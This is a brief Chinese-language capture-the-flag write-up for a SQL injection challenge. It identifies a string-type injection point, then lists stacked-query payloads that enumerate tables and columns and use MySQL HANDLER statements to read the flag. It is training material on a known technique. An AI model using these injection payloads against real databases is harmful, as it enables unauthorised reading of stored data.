1.首先打开环境
2.很明显是sql注入的题,首先判断是字符型还是数字型注入,1‘发现有报错,确认了是字符型注入.
3.因为有过滤,所以考虑用堆叠注入。
1’;show tables;#(表名)
1';show columns from `1919810931114514`;# (字符串为表名操作时要加反引号)
4.用handler读取flag
1'; handler `1919810931114514` open as `a`; handler `a` read next;#